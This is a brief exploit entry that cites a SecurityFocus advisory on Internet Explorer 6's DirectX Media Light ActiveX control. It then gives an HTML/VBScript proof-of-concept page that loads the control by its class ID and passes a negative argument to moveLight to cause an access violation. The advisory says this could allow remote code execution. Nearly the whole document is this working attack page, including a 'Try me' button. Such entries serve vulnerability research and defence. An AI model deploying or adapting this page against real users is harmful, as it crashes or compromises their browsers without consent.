source: https://www.securityfocus.com/bid/18303/info The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page. <!-- MS Internet Explorer 6 DirectX Media DoS Vulnerability DLL: dxtmsft.dll Discovered & Coded by: r0ut3r (writ3r [at] gmail.com) Description: Sub moveLight ( ByVal lightNum As Long , ByVal x As Long , ByVal y As Long , ByVal z As Long , ByVal fAbsolute As Long ) Supplying negative parameters throws an access violation. --> <object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight"> Unable to create object </object> <script language="vbscript"> Sub go DXTLight.moveLight "-1", "1", "1", "1", "1" End Sub </script> <input language=VBScript type="button" value="Try me" onclick="go()">